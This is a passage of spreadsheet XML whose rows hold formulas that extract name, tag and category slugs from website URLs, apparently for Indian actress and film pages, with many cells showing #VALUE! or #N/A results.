    ISNUMBER(FIND("tag/",$A263)), MID($A263, FIND("tag/",$A263) + 4, LEN($A263) - FIND("tag/",$A263)),
    ISNUMBER(FIND("category",$A263)), MID($A263, FIND("category",$A263) + 9, LEN($A263) - FIND("category",$A263)))</f>
        <v>#N/A</v>
      </c>
      <c r="F263" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="264" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A264" t="s">
        <v>2351</v>
      </c>
      <c r="B264" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C264" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D264" t="str">
        <f t="shared" si="12"/>
        <v>hindi-serial-actress/</v>
      </c>
      <c r="E264" t="str" cm="1">
        <f t="array" ref="E264">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A264)), MID($A264, FIND("name=",$A264) + 5, LEN($A264) - FIND("name=",$A264)),
    ISNUMBER(FIND("tag/",$A264)), MID($A264, FIND("tag/",$A264) + 4, LEN($A264) - FIND("tag/",$A264)),
    ISNUMBER(FIND("category",$A264)), MID($A264, FIND("category",$A264) + 9, LEN($A264) - FIND("category",$A264)))</f>
        <v>hindi-serial-actress/</v>
      </c>
      <c r="F264" t="s">
        <v>3338</v>
      </c>
    </row>
    <row r="265" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A265" t="s">
        <v>2352</v>
      </c>
      <c r="B265" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C265" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D265" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E265" t="e" cm="1">
        <f t="array" ref="E265">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A265)), MID($A265, FIND("name=",$A265) + 5, LEN($A265) - FIND("name=",$A265)),
    ISNUMBER(FIND("tag/",$A265)), MID($A265, FIND("tag/",$A265) + 4, LEN($A265) - FIND("tag/",$A265)),
    ISNUMBER(FIND("category",$A265)), MID($A265, FIND("category",$A265) + 9, LEN($A265) - FIND("category",$A265)))</f>
        <v>#N/A</v>
      </c>
      <c r="F265" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="266" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A266" t="s">
        <v>2327</v>
      </c>
      <c r="B266" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C266" t="str">
        <f t="shared" si="14"/>
        <v>1920-bollywood-movie/</v>
      </c>
      <c r="D266" t="e">
        <f t="shared" si="12"/>
        <v>#VALUE!</v>
      </c>
      <c r="E266" t="str" cm="1">
        <f t="array" ref="E266">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A266)), MID($A266, FIND("name=",$A266) + 5, LEN($A266) - FIND("name=",$A266)),
    ISNUMBER(FIND("tag/",$A266)), MID($A266, FIND("tag/",$A266) + 4, LEN($A266) - FIND("tag/",$A266)),
    ISNUMBER(FIND("category",$A266)), MID($A266, FIND("category",$A266) + 9, LEN($A266) - FIND("category",$A266)))</f>
        <v>1920-bollywood-movie/</v>
      </c>
      <c r="F266" t="s">
        <v>3327</v>
      </c>
    </row>
    <row r="267" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A267" t="s">
        <v>2352</v>
      </c>
      <c r="B267" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C267" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D267" t="e">
        <f t="shared" ref="D267:D330" si="15">IF(FIND("category",$A267,1)&gt;0,MID($A267,FIND("category",$A267,1)+9,LEN($A267)-FIND("category",$A267,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E267" t="e" cm="1">
        <f t="array" ref="E267">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A267)), MID($A267, FIND("name=",$A267) + 5, LEN($A267) - FIND("name=",$A267)),
    ISNUMBER(FIND("tag/",$A267)), MID($A267, FIND("tag/",$A267) + 4, LEN($A267) - FIND("tag/",$A267)),
    ISNUMBER(FIND("category",$A267)), MID($A267, FIND("category",$A267) + 9, LEN($A267) - FIND("category",$A267)))</f>
        <v>#N/A</v>
      </c>
      <c r="F267" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="268" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A268" t="s">
        <v>2353</v>
      </c>
      <c r="B268" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C268" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D268" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E268" t="e" cm="1">
        <f t="array" ref="E268">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A268)), MID($A268, FIND("name=",$A268) + 5, LEN($A268) - FIND("name=",$A268)),
    ISNUMBER(FIND("tag/",$A268)), MID($A268, FIND("tag/",$A268) + 4, LEN($A268) - FIND("tag/",$A268)),
    ISNUMBER(FIND("category",$A268)), MID($A268, FIND("category",$A268) + 9, LEN($A268) - FIND("category",$A268)))</f>
        <v>#N/A</v>
      </c>
      <c r="F268" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="269" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A269" t="s">
        <v>2352</v>
      </c>
      <c r="B269" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C269" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D269" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E269" t="e" cm="1">
        <f t="array" ref="E269">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A269)), MID($A269, FIND("name=",$A269) + 5, LEN($A269) - FIND("name=",$A269)),
    ISNUMBER(FIND("tag/",$A269)), MID($A269, FIND("tag/",$A269) + 4, LEN($A269) - FIND("tag/",$A269)),
    ISNUMBER(FIND("category",$A269)), MID($A269, FIND("category",$A269) + 9, LEN($A269) - FIND("category",$A269)))</f>
        <v>#N/A</v>
      </c>
      <c r="F269" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="270" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A270" t="s">
        <v>2351</v>
      </c>
      <c r="B270" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C270" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D270" t="str">
        <f t="shared" si="15"/>
        <v>hindi-serial-actress/</v>
      </c>
      <c r="E270" t="str" cm="1">
        <f t="array" ref="E270">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A270)), MID($A270, FIND("name=",$A270) + 5, LEN($A270) - FIND("name=",$A270)),
    ISNUMBER(FIND("tag/",$A270)), MID($A270, FIND("tag/",$A270) + 4, LEN($A270) - FIND("tag/",$A270)),
    ISNUMBER(FIND("category",$A270)), MID($A270, FIND("category",$A270) + 9, LEN($A270) - FIND("category",$A270)))</f>
        <v>hindi-serial-actress/</v>
      </c>
      <c r="F270" t="s">
        <v>3338</v>
      </c>
    </row>
    <row r="271" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A271" t="s">
        <v>2354</v>
      </c>
      <c r="B271" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C271" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D271" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E271" t="e" cm="1">
        <f t="array" ref="E271">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A271)), MID($A271, FIND("name=",$A271) + 5, LEN($A271) - FIND("name=",$A271)),
    ISNUMBER(FIND("tag/",$A271)), MID($A271, FIND("tag/",$A271) + 4, LEN($A271) - FIND("tag/",$A271)),
    ISNUMBER(FIND("category",$A271)), MID($A271, FIND("category",$A271) + 9, LEN($A271) - FIND("category",$A271)))</f>
        <v>#N/A</v>
      </c>
      <c r="F271" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="272" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A272" t="s">
        <v>2322</v>
      </c>
      <c r="B272" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C272" t="str">
        <f t="shared" si="14"/>
        <v>chandini-tamilarasan/</v>
      </c>
      <c r="D272" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E272" t="str" cm="1">
        <f t="array" ref="E272">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A272)), MID($A272, FIND("name=",$A272) + 5, LEN($A272) - FIND("name=",$A272)),
    ISNUMBER(FIND("tag/",$A272)), MID($A272, FIND("tag/",$A272) + 4, LEN($A272) - FIND("tag/",$A272)),
    ISNUMBER(FIND("category",$A272)), MID($A272, FIND("category",$A272) + 9, LEN($A272) - FIND("category",$A272)))</f>
        <v>chandini-tamilarasan/</v>
      </c>
      <c r="F272" t="s">
        <v>3323</v>
      </c>
    </row>
    <row r="273" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A273" t="s">
        <v>2322</v>
      </c>
      <c r="B273" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C273" t="str">
        <f t="shared" si="14"/>
        <v>chandini-tamilarasan/</v>
      </c>
      <c r="D273" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E273" t="str" cm="1">
        <f t="array" ref="E273">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A273)), MID($A273, FIND("name=",$A273) + 5, LEN($A273) - FIND("name=",$A273)),
    ISNUMBER(FIND("tag/",$A273)), MID($A273, FIND("tag/",$A273) + 4, LEN($A273) - FIND("tag/",$A273)),
    ISNUMBER(FIND("category",$A273)), MID($A273, FIND("category",$A273) + 9, LEN($A273) - FIND("category",$A273)))</f>
        <v>chandini-tamilarasan/</v>
      </c>
      <c r="F273" t="s">
        <v>3323</v>
      </c>
    </row>
    <row r="274" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A274" t="s">
        <v>2322</v>
      </c>
      <c r="B274" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C274" t="str">
        <f t="shared" si="14"/>
        <v>chandini-tamilarasan/</v>
      </c>
      <c r="D274" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E274" t="str" cm="1">
        <f t="array" ref="E274">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A274)), MID($A274, FIND("name=",$A274) + 5, LEN($A274) - FIND("name=",$A274)),
    ISNUMBER(FIND("tag/",$A274)), MID($A274, FIND("tag/",$A274) + 4, LEN($A274) - FIND("tag/",$A274)),
    ISNUMBER(FIND("category",$A274)), MID($A274, FIND("category",$A274) + 9, LEN($A274) - FIND("category",$A274)))</f>
        <v>chandini-tamilarasan/</v>
      </c>
      <c r="F274" t="s">
        <v>3323</v>
      </c>
    </row>
    <row r="275" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A275" t="s">
        <v>2343</v>
      </c>
      <c r="B275" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C275" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D275" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E275" t="e" cm="1">
        <f t="array" ref="E275">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A275)), MID($A275, FIND("name=",$A275) + 5, LEN($A275) - FIND("name=",$A275)),
    ISNUMBER(FIND("tag/",$A275)), MID($A275, FIND("tag/",$A275) + 4, LEN($A275) - FIND("tag/",$A275)),
    ISNUMBER(FIND("category",$A275)), MID($A275, FIND("category",$A275) + 9, LEN($A275) - FIND("category",$A275)))</f>
        <v>#N/A</v>
      </c>
      <c r="F275" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="276" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A276" t="s">
        <v>2319</v>
      </c>
      <c r="B276" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C276" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D276" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E276" t="e" cm="1">
        <f t="array" ref="E276">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A276)), MID($A276, FIND("name=",$A276) + 5, LEN($A276) - FIND("name=",$A276)),
    ISNUMBER(FIND("tag/",$A276)), MID($A276, FIND("tag/",$A276) + 4, LEN($A276) - FIND("tag/",$A276)),
    ISNUMBER(FIND("category",$A276)), MID($A276, FIND("category",$A276) + 9, LEN($A276) - FIND("category",$A276)))</f>
        <v>#N/A</v>
      </c>
      <c r="F276" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="277" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A277" t="s">
        <v>2343</v>
      </c>
      <c r="B277" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C277" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D277" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E277" t="e" cm="1">
        <f t="array" ref="E277">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A277)), MID($A277, FIND("name=",$A277) + 5, LEN($A277) - FIND("name=",$A277)),
    ISNUMBER(FIND("tag/",$A277)), MID($A277, FIND("tag/",$A277) + 4, LEN($A277) - FIND("tag/",$A277)),
    ISNUMBER(FIND("category",$A277)), MID($A277, FIND("category",$A277) + 9, LEN($A277) - FIND("category",$A277)))</f>
        <v>#N/A</v>
      </c>
      <c r="F277" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="278" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A278" t="s">
        <v>2343</v>
      </c>
      <c r="B278" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C278" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D278" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E278" t="e" cm="1">
        <f t="array" ref="E278">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A278)), MID($A278, FIND("name=",$A278) + 5, LEN($A278) - FIND("name=",$A278)),
    ISNUMBER(FIND("tag/",$A278)), MID($A278, FIND("tag/",$A278) + 4, LEN($A278) - FIND("tag/",$A278)),
    ISNUMBER(FIND("category",$A278)), MID($A278, FIND("category",$A278) + 9, LEN($A278) - FIND("category",$A278)))</f>
        <v>#N/A</v>
      </c>
      <c r="F278" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="279" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A279" t="s">
        <v>2355</v>
      </c>
      <c r="B279" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C279" t="str">
        <f t="shared" si="14"/>
        <v>kannada-serial-actress/</v>
      </c>
      <c r="D279" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E279" t="str" cm="1">
        <f t="array" ref="E279">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A279)), MID($A279, FIND("name=",$A279) + 5, LEN($A279) - FIND("name=",$A279)),
    ISNUMBER(FIND("tag/",$A279)), MID($A279, FIND("tag/",$A279) + 4, LEN($A279) - FIND("tag/",$A279)),
    ISNUMBER(FIND("category",$A279)), MID($A279, FIND("category",$A279) + 9, LEN($A279) - FIND("category",$A279)))</f>
        <v>kannada-serial-actress/</v>
      </c>
      <c r="F279" t="s">
        <v>3320</v>
      </c>
    </row>
    <row r="280" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A280" t="s">
        <v>2319</v>
      </c>
      <c r="B280" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C280" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D280" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E280" t="e" cm="1">
        <f t="array" ref="E280">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A280)), MID($A280, FIND("name=",$A280) + 5, LEN($A280) - FIND("name=",$A280)),
    ISNUMBER(FIND("tag/",$A280)), MID($A280, FIND("tag/",$A280) + 4, LEN($A280) - FIND("tag/",$A280)),
    ISNUMBER(FIND("category",$A280)), MID($A280, FIND("category",$A280) + 9, LEN($A280) - FIND("category",$A280)))</f>
        <v>#N/A</v>
      </c>
      <c r="F280" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="281" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A281" t="s">
        <v>2356</v>
      </c>
      <c r="B281" t="str">
        <f t="shared" si="13"/>
        <v>Antra&amp;date=2023-11-29</v>
      </c>
      <c r="C281" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D281" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E281" t="str" cm="1">
        <f t="array" ref="E281">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A281)), MID($A281, FIND("name=",$A281) + 5, LEN($A281) - FIND("name=",$A281)),
    ISNUMBER(FIND("tag/",$A281)), MID($A281, FIND("tag/",$A281) + 4, LEN($A281) - FIND("tag/",$A281)),
    ISNUMBER(FIND("category",$A281)), MID($A281, FIND("category",$A281) + 9, LEN($A281) - FIND("category",$A281)))</f>
        <v>Antra&amp;date=2023-11-29</v>
      </c>
      <c r="F281" t="s">
        <v>3339</v>
      </c>
    </row>
    <row r="282" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A282" t="s">
        <v>2319</v>
      </c>
      <c r="B282" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C282" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D282" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E282" t="e" cm="1">
        <f t="array" ref="E282">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A282)), MID($A282, FIND("name=",$A282) + 5, LEN($A282) - FIND("name=",$A282)),
    ISNUMBER(FIND("tag/",$A282)), MID($A282, FIND("tag/",$A282) + 4, LEN($A282) - FIND("tag/",$A282)),
    ISNUMBER(FIND("category",$A282)), MID($A282, FIND("category",$A282) + 9, LEN($A282) - FIND("category",$A282)))</f>
        <v>#N/A</v>
      </c>
      <c r="F282" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="283" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A283" t="s">
        <v>2343</v>
      </c>
      <c r="B283" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C283" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D283" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E283" t="e" cm="1">
        <f t="array" ref="E283">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A283)), MID($A283, FIND("name=",$A283) + 5, LEN($A283) - FIND("name=",$A283)),
    ISNUMBER(FIND("tag/",$A283)), MID($A283, FIND("tag/",$A283) + 4, LEN($A283) - FIND("tag/",$A283)),
    ISNUMBER(FIND("category",$A283)), MID($A283, FIND("category",$A283) + 9, LEN($A283) - FIND("category",$A283)))</f>
        <v>#N/A</v>
      </c>
      <c r="F283" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="284" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A284" t="s">
        <v>2343</v>
      </c>
      <c r="B284" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C284" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D284" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E284" t="e" cm="1">
        <f t="array" ref="E284">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A284)), MID($A284, FIND("name=",$A284) + 5, LEN($A284) - FIND("name=",$A284)),
    ISNUMBER(FIND("tag/",$A284)), MID($A284, FIND("tag/",$A284) + 4, LEN($A284) - FIND("tag/",$A284)),
    ISNUMBER(FIND("category",$A284)), MID($A284, FIND("category",$A284) + 9, LEN($A284) - FIND("category",$A284)))</f>
        <v>#N/A</v>
      </c>
      <c r="F284" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="285" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A285" t="s">
        <v>2343</v>
      </c>
      <c r="B285" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C285" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D285" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E285" t="e" cm="1">
        <f t="array" ref="E285">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A285)), MID($A285, FIND("name=",$A285) + 5, LEN($A285) - FIND("name=",$A285)),
    ISNUMBER(FIND("tag/",$A285)), MID($A285, FIND("tag/",$A285) + 4, LEN($A285) - FIND("tag/",$A285)),
    ISNUMBER(FIND("category",$A285)), MID($A285, FIND("category",$A285) + 9, LEN($A285) - FIND("category",$A285)))</f>
        <v>#N/A</v>
      </c>
      <c r="F285" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="286" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A286" t="s">
        <v>2268</v>
      </c>
      <c r="B286" t="str">
        <f t="shared" si="13"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C286" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D286" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E286" t="str" cm="1">
        <f t="array" ref="E286">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A286)), MID($A286, FIND("name=",$A286) + 5, LEN($A286) - FIND("name=",$A286)),
    ISNUMBER(FIND("tag/",$A286)), MID($A286, FIND("tag/",$A286) + 4, LEN($A286) - FIND("tag/",$A286)),
    ISNUMBER(FIND("category",$A286)), MID($A286, FIND("category",$A286) + 9, LEN($A286) - FIND("category",$A286)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F286" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="287" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A287" t="s">
        <v>2268</v>
      </c>
      <c r="B287" t="str">
        <f t="shared" si="13"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C287" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D287" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E287" t="str" cm="1">
        <f t="array" ref="E287">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A287)), MID($A287, FIND("name=",$A287) + 5, LEN($A287) - FIND("name=",$A287)),
    ISNUMBER(FIND("tag/",$A287)), MID($A287, FIND("tag/",$A287) + 4, LEN($A287) - FIND("tag/",$A287)),
    ISNUMBER(FIND("category",$A287)), MID($A287, FIND("category",$A287) + 9, LEN($A287) - FIND("category",$A287)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F287" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="288" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A288" t="s">
        <v>2282</v>
      </c>
      <c r="B288" t="str">
        <f t="shared" si="13"/>
        <v>Malavika%20Mohanan&amp;date=2023-11-14</v>
      </c>
      <c r="C288" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D288" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E288" t="str" cm="1">
        <f t="array" ref="E288">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A288)), MID($A288, FIND("name=",$A288) + 5, LEN($A288) - FIND("name=",$A288)),
    ISNUMBER(FIND("tag/",$A288)), MID($A288, FIND("tag/",$A288) + 4, LEN($A288) - FIND("tag/",$A288)),
    ISNUMBER(FIND("category",$A288)), MID($A288, FIND("category",$A288) + 9, LEN($A288) - FIND("category",$A288)))</f>
        <v>Malavika%20Mohanan&amp;date=2023-11-14</v>
      </c>
      <c r="F288" t="s">
        <v>3310</v>
      </c>
    </row>
    <row r="289" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A289" t="s">
        <v>2282</v>
      </c>
      <c r="B289" t="str">
        <f t="shared" si="13"/>
        <v>Malavika%20Mohanan&amp;date=2023-11-14</v>
      </c>
      <c r="C289" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D289" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E289" t="str" cm="1">
        <f t="array" ref="E289">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A289)), MID($A289, FIND("name=",$A289) + 5, LEN($A289) - FIND("name=",$A289)),
    ISNUMBER(FIND("tag/",$A289)), MID($A289, FIND("tag/",$A289) + 4, LEN($A289) - FIND("tag/",$A289)),
    ISNUMBER(FIND("category",$A289)), MID($A289, FIND("category",$A289) + 9, LEN($A289) - FIND("category",$A289)))</f>
        <v>Malavika%20Mohanan&amp;date=2023-11-14</v>
      </c>
      <c r="F289" t="s">
        <v>3310</v>
      </c>
    </row>
    <row r="290" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A290" t="s">
        <v>2282</v>
      </c>
      <c r="B290" t="str">
        <f t="shared" si="13"/>
        <v>Malavika%20Mohanan&amp;date=2023-11-14</v>
      </c>
      <c r="C290" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D290" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E290" t="str" cm="1">
        <f t="array" ref="E290">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A290)), MID($A290, FIND("name=",$A290) + 5, LEN($A290) - FIND("name=",$A290)),
    ISNUMBER(FIND("tag/",$A290)), MID($A290, FIND("tag/",$A290) + 4, LEN($A290) - FIND("tag/",$A290)),
    ISNUMBER(FIND("category",$A290)), MID($A290, FIND("category",$A290) + 9, LEN($A290) - FIND("category",$A290)))</f>
        <v>Malavika%20Mohanan&amp;date=2023-11-14</v>
      </c>
      <c r="F290" t="s">
        <v>3310</v>
      </c>
    </row>
    <row r="291" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A291" t="s">
        <v>2282</v>
      </c>
      <c r="B291" t="str">
        <f t="shared" si="13"/>
        <v>Malavika%20Mohanan&amp;date=2023-11-14</v>
      </c>
      <c r="C291" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D291" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E291" t="str" cm="1">
        <f t="array" ref="E291">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A291)), MID($A291, FIND("name=",$A291) + 5, LEN($A291) - FIND("name=",$A291)),
    ISNUMBER(FIND("tag/",$A291)), MID($A291, FIND("tag/",$A291) + 4, LEN($A291) - FIND("tag/",$A291)),
    ISNUMBER(FIND("category",$A291)), MID($A291, FIND("category",$A291) + 9, LEN($A291) - FIND("category",$A291)))</f>
        <v>Malavika%20Mohanan&amp;date=2023-11-14</v>
      </c>
      <c r="F291" t="s">
        <v>3310</v>
      </c>
    </row>
    <row r="292" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A292" t="s">
        <v>2357</v>
      </c>
      <c r="B292" t="str">
        <f t="shared" si="13"/>
        <v>Ushasi&amp;date=2024-07-24</v>
      </c>
      <c r="C292" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D292" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E292" t="str" cm="1">
        <f t="array" ref="E292">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A292)), MID($A292, FIND("name=",$A292) + 5, LEN($A292) - FIND("name=",$A292)),
    ISNUMBER(FIND("tag/",$A292)), MID($A292, FIND("tag/",$A292) + 4, LEN($A292) - FIND("tag/",$A292)),
    ISNUMBER(FIND("category",$A292)), MID($A292, FIND("category",$A292) + 9, LEN($A292) - FIND("category",$A292)))</f>
        <v>Ushasi&amp;date=2024-07-24</v>
      </c>
      <c r="F292" t="s">
        <v>3340</v>
      </c>
    </row>
    <row r="293" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A293" t="s">
        <v>2258</v>
      </c>
      <c r="B293" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C293" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D293" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E293" t="e" cm="1">
        <f t="array" ref="E293">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A293)), MID($A293, FIND("name=",$A293) + 5, LEN($A293) - FIND("name=",$A293)),
    ISNUMBER(FIND("tag/",$A293)), MID($A293, FIND("tag/",$A293) + 4, LEN($A293) - FIND("tag/",$A293)),
